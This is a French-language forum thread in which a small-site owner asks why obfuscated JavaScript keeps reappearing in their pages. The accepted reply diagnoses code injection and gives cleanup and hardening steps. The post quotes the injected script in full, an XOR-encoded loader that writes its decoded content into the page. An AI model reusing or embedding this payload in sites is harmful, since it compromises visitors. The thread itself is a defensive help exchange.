Bonjour, je créer des sites pour m'occuper qui ne sont pas souvent très connus mais sa m'occupe et le script n'est pas super mais bon ...

Mon problème est que j'ai refait deux fois mon site car j'avais le code suivant qui s'intégrais tous seul :

<script language='javascript'>var ewjiRNjmidvKoG='';WIMAZQPMxKxqknA='iHEcfS';var 
IqffjkAHo='jpwfEKWZbKHJzegTnSUTESWQujKdnRjXXQ';ylHHsiYQHIaPXHLWv='iyfGL';var upReKQvtmF=0;urNBMhiClQJSn='gkpWdT';var 
DsUUJQDkuAybtumCCfF='%4C%1E%66%37%2A%3A%3F%42%38%3A%29%47%47%0F%20%1A%23%6F%7B%6A%3D%32%23%58%0B%27%08%0B%20%44%37%2A%36%45%19%19%48%2
6%2C%3E%65%06%2E%2E%2B%0F%09%13%76%4E%35%27%35%28%36%35%3E%07%0E%2E%16%53%70%5A%7A%78%22%09%02%18%0A%29%22%39%3D%5F%69%26%25%58%45%0F%
31%07%34%3D%20%78%71%66%73%55%1D%22%64%1A%3A%57%7A%69%73%4A%18%04%16%24%28%32%67%40%7A%6A%6A%0C%16%17%35%0D%36%68%76%74%71%77%3C%14%18
%2C%0D%6E%25%03%3C%2C%39%57%52%47%44%65%26%36%28%05%22%26%22%1F%0C%67%3C%1A%6E%77%64%67%6D%6B%7E%1C%0C%39%05%03%37%54';tNZgZLbHExemhLK
='GvZXxXwSSrDHywfWW';var 
YosCfDQXijJkMDP=DsUUJQDkuAybtumCCfF.length/3;IlZBYHGeUUNDJLapsbsm='SURgNCIJhZhmPmoyBDXNNx';DsUUJQDkuAybtumCCfF=unescape(DsUUJQDkuAybtu
mCCfF);UIvEdENLdScmkQKUjk='eKyjZLHyD';for(DeuIEsJXCIMaxHgXxVtwZs=0;DeuIEsJXCIMaxHgXxVtwZs<YosCfDQXijJkMDP;DeuIEsJXCIMaxHgXxVtwZs++)
{upReKQvtmF++;if(IqffjkAHo.length<=upReKQvtmF) upReKQvtmF=0;WszHMY=DsUUJQDkuAybtumCCfF.charCodeAt(DeuIEsJXCIMaxHgXxVtwZs); 
TrTgSjVLBgEHcZODeO='wcoYzlwCqQIWyrkzdORhfQC'; if(IqffjkAHo.charCodeAt(upReKQvtmF)!=WszHMY) WszHMY^=IqffjkAHo.charCodeAt(upReKQvtmF); 
goZMVdrRqfaRiXWfZEQdMeBo='SzEhKIQFgWMaqrCXm';ewjiRNjmidvKoG+=String.fromCharCode(WszHMY);} 
MJiRsETaWCMkbvgczphog='EtrwuSVKPLZg';document.write(ewjiRNjmidvKoG);nfKvvuWAHwGmawGVlLAHNHSOq='uqzMywr';</script>

J'avais des frames avant mais j'ai arrêter avec car je pensais que sa venais de la, j'avais des include en php je les ai enlever et il ont réussi a revenir.

Je pus quoi faire je dois a chaque foi renvoyez les pages affecter.

Merci de votre aide.

1 réponse


ash
Réponse acceptée

Bonjour,
c'est une injection de code malicieux dans ton code.

Il y a une faille dans ton site (cela peut également provenir de ton hébergeur, mais si c'est toi qui code, tu as peut-être fait une petite erreur qui te coute désormais chère).

Si ton hébergeur le permet, fait un scan avec un antivirus dans ton ftp : clamAV par exemple.
Si tu utilises Mysql : sauvegarde. Efface ton site. Corrige la sécuritée (toutes les entrées, il y a des tutos dessus par Grafikart). Change tes mots de passes de connexion, ftp et mysql. Re-upload les fichiers sains, reconnecte et importe ta bdd.

Enfin, par mesure de prévention il existe des outils qui te permettent de savoir automatiquement si des outils ont été modifié sur ton serveur en moins de 3 sec. A essayer.